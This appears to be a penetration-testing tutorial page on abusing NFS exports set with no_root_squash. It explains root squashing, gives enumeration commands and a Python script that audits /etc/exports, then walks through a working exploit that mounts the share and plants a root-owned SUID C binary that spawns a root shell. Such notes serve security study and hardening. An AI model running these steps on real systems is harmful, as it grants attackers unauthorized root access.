# NFS Root Squashing

## Background Knowledge: `no_root_squash`

**Q: What is NFS?**

**A: Network File System (NFS)** is a UDP-based RPC service. It allows remote hosts to mount file systems over a network and interact with those file systems as though they were mounted locally.

**Q: What is root squash?**

**A:** Root squash is a special **mapping** that maps the **remote root user** (uid 0) to the **local "nobody" user** (uid 65534), which has minimal privileges.

**Q: What is `no_root_squash`?**

**A:** If a directory in the `/etc/exports` file is configured with `no_root_squash`, then a **remote root user** is mapped to the **local root user** for that export.

**Q: How is this related to privesc?**

**A:** Suppose we are the root user on our attack machine. We can **mount** this target directory on our attack machine and write to this directory as the root user on the victim machine. The attack plan is:

1. Mount the target directory locally
2. Create a privesc exploit as SUID binary in the local directory
3. Execute this privesc exploit on the victim machine

When we create the privesc exploit locally, this exploit will be created on the victim machine as a **root-owned** SUID binary simultaneously through NFS. Then we can execute this privesc exploit on the victim machine and get a root shell.

## Enumeration

Examine `/etc/exports`:

```bash
cat /etc/exports
```

If `/tmp` has the `no_root_squash` option turned on, the victim machine is vulnerable to NFS root squashing:

![no\_root\_squash](/files/-MfpI1lfqWkXpGpvqWIZ)

On our attack machine, we can verify that the remote `/tmp` directory is mountable:

```bash
showmount -e <remote_ip>
```
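The same `/etc/exports` check can be run as an audit on the NFS server. This is an added example, not part of the original notes: `audit_exports` and the sample file are constructed for illustration, and it goes slightly beyond the page by also flagging `anonuid=0`, which maps a squashed root back to uid 0.

```python
# Constructed sample /etc/exports content (not taken from a real host).
SAMPLE_EXPORTS = r"""
# path         client(options)
/srv/projects  10.0.0.0/24(rw,sync,root_squash)
/tmp           *(rw,sync,no_root_squash)
/srv/backup    -rw,no_root_squash backup01 \
               audit01(ro,root_squash)
/srv/legacy    10.0.0.9(rw,anonuid=0)
"""


def audit_exports(text):
    """Return (path, client, reason) for each export where remote root stays uid 0.

    Assumption: export paths contain no quoted spaces (those are not handled).
    """
    findings = []
    # Join backslash-continued lines, then handle one export entry per line.
    for line in text.replace("\\\n", " ").splitlines():
        tokens = line.split("#", 1)[0].split()  # drop comments, split on whitespace
        if not tokens:
            continue
        path, clients = tokens[0], tokens[1:]
        defaults = []
        if clients and clients[0].startswith("-"):  # "-opt,opt" sets per-line defaults
            defaults = clients.pop(0)[1:].split(",")
        for entry in clients or ["*"]:  # no client listed: entry applies to any host
            name, _, opts = entry.partition("(")
            options = defaults + [o for o in opts.rstrip(")").split(",") if o]
            squashed, anon_is_root = True, False  # root_squash is the default
            for opt in options:  # later options override earlier ones
                if opt in ("root_squash", "no_root_squash"):
                    squashed = opt == "root_squash"
                elif opt.startswith("anonuid="):
                    anon_is_root = opt == "anonuid=0"
            if not squashed:
                findings.append((path, name or "*", "no_root_squash"))
            elif anon_is_root:
                findings.append((path, name or "*", "anonuid=0"))
    return findings


if __name__ == "__main__":
    for path, client, reason in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} exported to {client}: {reason}")
```

Every flagged entry should be switched back to `root_squash` (the default) unless the client genuinely needs root access to the export.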

## Exploitation

Create a temporary directory on our attack machine.

```bash
mkdir /tmp/1
```

Mount the target directory.

```bash
mount -o rw,vers=2 <remote_ip>:<target_directory> /tmp/1
```

Prepare the privesc source code `x.c`.

```bash
printf '#include <stdlib.h>\n#include <unistd.h>\nint main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }\n' > /tmp/1/x.c
```

Compile the source code.

```bash
gcc /tmp/1/x.c -o /tmp/1/x
```

Turn on the SUID bit.

```bash
chmod +s /tmp/1/x
```

Trigger the payload on the victim machine.

```bash
/tmp/x
```


